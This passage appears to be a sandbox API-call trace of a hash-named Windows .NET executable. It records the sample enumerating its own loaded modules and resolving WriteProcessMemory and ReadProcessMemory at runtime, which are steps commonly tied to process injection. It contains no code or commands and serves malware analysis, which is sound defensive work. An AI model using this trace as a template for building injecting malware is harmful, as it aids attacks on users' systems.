EntryPoint=0x757c1b90)) returned 1 [0167.545] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b43d8, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0167.546] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b43d8, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0167.546] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73d90000, lpmodinfo=0x2361f28, cb=0xc | out: lpmodinfo=0x2361f28*(lpBaseOfDll=0x73d90000, SizeOfImage=0x92000, EntryPoint=0x73dd0380)) returned 1 [0167.546] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b43d8, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0167.547] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b43d8, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0167.547] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74380000, lpmodinfo=0x2364034, cb=0xc | out: lpmodinfo=0x2364034*(lpBaseOfDll=0x74380000, SizeOfImage=0x7b000, EntryPoint=0x7439e970)) returned 1 [0167.547] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b43d8, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0167.548] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b43d8, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0167.548] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75a40000, lpmodinfo=0x2366148, cb=0xc | out: lpmodinfo=0x2366148*(lpBaseOfDll=0x75a40000, SizeOfImage=0xbe000, EntryPoint=0x75a75630)) returned 1 [0167.548] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b43d8, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0167.549] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b43d8, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0167.549] GetModuleInformation (in: hProcess=0x2e4, hModule=0x758c0000, lpmodinfo=0x2368254, cb=0xc | out: lpmodinfo=0x2368254*(lpBaseOfDll=0x758c0000, SizeOfImage=0x44000, EntryPoint=0x758d9d80)) returned 1 [0167.549] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b43d8, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0167.550] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b43d8, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0167.555] CloseHandle (hObject=0x2e4) returned 1 [0167.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteProcessMemory", cchWideChar=18, lpMultiByteStr=0x19cb70, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteProcessMemoryd", lpUsedDefaultChar=0x0) returned 18 [0167.556] GetProcAddress (hModule=0x74610000, lpProcName="WriteProcessMemory") returned 0x74652850 [0167.575] GetCurrentProcessId () returned 0x1318 [0167.575] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0167.575] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x23ab580, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x23ab580, lpcbNeeded=0x19cb68) returned 1 [0167.582] CloseHandle (hObject=0x2e4) returned 1 [0167.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReadProcessMemory", cchWideChar=17, lpMultiByteStr=0x19cb70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadProcessMemoryÚd", lpUsedDefaultChar=0x0) returned 17 [0167.582] GetProcAddress (hModule=0x74610000, lpProcName="ReadProcessMemory") returned 0x74651c80 [0167.600] GetCurrentProcessId () returned 0x1318 [0167.600] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0167.600] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x23ff3a0, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x23ff3a0, lpcbNeeded=0x19cb68) returned 1 [0167.601] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.601] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0167.601] CoTaskMemFree (pv=0x8b4c68) [0167.601] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.601] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0167.602] CoTaskMemFree (pv=0x8b4c68) [0167.602] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.602] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0167.602] CoTaskMemFree (pv=0x8b4c68) [0167.602] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.602] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0167.602] CoTaskMemFree (pv=0x8b4c68) [0167.602] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.602] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0167.603] CoTaskMemFree (pv=0x8b4c68) [0167.603] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.603] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0167.603] CoTaskMemFree (pv=0x8b4c68) [0167.603] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.603] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0167.604] CoTaskMemFree (pv=0x8b4c68) [0167.604] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.604] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0167.604] CoTaskMemFree (pv=0x8b4c68) [0167.604] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.604] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0167.605] CoTaskMemFree (pv=0x8b4c68) [0167.605] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.605] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0167.605] CoTaskMemFree (pv=0x8b4c68) [0167.605] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.605] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0167.605] CoTaskMemFree (pv=0x8b4c68) [0167.605] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.605] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0167.606] CoTaskMemFree (pv=0x8b4c68) [0167.606] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.606] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0167.606] CoTaskMemFree (pv=0x8b4c68) [0167.606] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.606] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0167.607] CoTaskMemFree (pv=0x8b4c68) [0167.607] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.607] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0167.607] CoTaskMemFree (pv=0x8b4c68) [0167.607] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.607] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0167.607] CoTaskMemFree (pv=0x8b4c68) [0167.608] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.608] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0167.608] CoTaskMemFree (pv=0x8b4c68) [0167.608] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.608] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0167.608] CoTaskMemFree (pv=0x8b4c68) [0167.608] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.608] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75970000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0167.609] CoTaskMemFree (pv=0x8b4c68) [0167.609] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.609] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75970000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0167.609] CoTaskMemFree (pv=0x8b4c68) [0167.609] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.609] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e40000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0167.610] CoTaskMemFree (pv=0x8b4c68) [0167.610] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.610] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e40000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0167.610] CoTaskMemFree (pv=0x8b4c68) [0167.610] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.610] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e30000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0167.611] CoTaskMemFree (pv=0x8b4c68) [0167.611] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.611] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e30000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0167.611] CoTaskMemFree (pv=0x8b4c68) [0167.611] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.611] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77040000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0167.613] CoTaskMemFree (pv=0x8b4c68) [0167.613] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.613] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77040000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0167.613] CoTaskMemFree (pv=0x8b4c68) [0167.613] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.613] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0167.614] CoTaskMemFree (pv=0x8b4c68) [0167.614] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.614] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0167.614] CoTaskMemFree (pv=0x8b4c68) [0167.614] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.615] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a00000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0167.616] CoTaskMemFree (pv=0x8b4c68) [0167.616] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.616] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a00000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0167.617] CoTaskMemFree (pv=0x8b4c68) [0167.617] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.617] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74400000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0167.617] CoTaskMemFree (pv=0x8b4c68) [0167.617] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.617] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74400000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0167.618] CoTaskMemFree (pv=0x8b4c68) [0167.618] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.618] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a50000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0167.618] CoTaskMemFree (pv=0x8b4c68) [0167.618] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.618] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a50000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0167.619] CoTaskMemFree (pv=0x8b4c68) [0167.619] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.619] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x755c0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0167.619] CoTaskMemFree (pv=0x8b4c68) [0167.619] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.620] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x755c0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0167.620] CoTaskMemFree (pv=0x8b4c68) [0167.620] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.620] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74990000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0167.621] CoTaskMemFree (pv=0x8b4c68) [0167.621] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.621] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74990000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0167.621] CoTaskMemFree (pv=0x8b4c68) [0167.621] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.621] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77030000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0167.622] CoTaskMemFree (pv=0x8b4c68) [0167.622] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.622] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77030000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0167.622] CoTaskMemFree (pv=0x8b4c68) [0167.622] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.623] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d310000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0167.623] CoTaskMemFree (pv=0x8b4c68) [0167.623] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.623] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d310000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0167.624] CoTaskMemFree (pv=0x8b4c68) [0167.624] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.624] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0167.625] CoTaskMemFree (pv=0x8b4c68) [0167.625] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.625] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0167.625] CoTaskMemFree (pv=0x8b4c68) [0167.625] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.625] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c650000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0167.626] CoTaskMemFree (pv=0x8b4c68) [0167.626] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.626] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c650000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0167.627] CoTaskMemFree (pv=0x8b4c68) [0167.627] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.627] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x69850000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0167.628] CoTaskMemFree (pv=0x8b4c68) [0167.628] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.628] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x69850000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll")) returned 0x68 [0167.629] CoTaskMemFree (pv=0x8b4c68) [0167.629] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.629] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75360000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0167.630] CoTaskMemFree (pv=0x8b4c68) [0167.630] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.630] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75360000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0167.631] CoTaskMemFree (pv=0x8b4c68) [0167.631] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.631] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6fef0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0167.632] CoTaskMemFree (pv=0x8b4c68) [0167.632] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.632] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6fef0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0167.634] CoTaskMemFree (pv=0x8b4c68) [0167.634] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.634] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f820000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0167.635] CoTaskMemFree (pv=0x8b4c68) [0167.635] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.635] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f820000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTSP.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")) returned 0x1f [0167.636] CoTaskMemFree (pv=0x8b4c68) [0167.636] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.636] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0167.637] CoTaskMemFree (pv=0x8b4c68) [0167.637] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.637] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")) returned 0x1e [0167.638] CoTaskMemFree (pv=0x8b4c68) [0167.638] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.638] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73ae0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0167.639] CoTaskMemFree (pv=0x8b4c68) [0167.639] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.639] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73ae0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0167.640] CoTaskMemFree (pv=0x8b4c68) [0167.640] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.640] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c850000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0167.640] CoTaskMemFree (pv=0x8b4c68) [0167.641] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.641] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c850000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0167.641] CoTaskMemFree (pv=0x8b4c68) [0167.641] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.641] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75b00000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0167.642] CoTaskMemFree (pv=0x8b4c68) [0167.643] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.643] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75b00000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0167.643] CoTaskMemFree (pv=0x8b4c68) [0167.644] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.644] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6ad40000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0167.644] CoTaskMemFree (pv=0x8b4c68) [0167.644] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.645] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6ad40000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll")) returned 0x64 [0167.645] CoTaskMemFree (pv=0x8b4c68) [0167.646] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.646] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0167.647] CoTaskMemFree (pv=0x8b4c68) [0167.647] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.647] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll")) returned 0x74 [0167.648] CoTaskMemFree (pv=0x8b4c68) [0167.650] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.650] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x68bf0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0167.651] CoTaskMemFree (pv=0x8b4c68) [0167.651] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.651] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x68bf0000, lpFilename=0x8b4c68, nSize=0x800 | out: 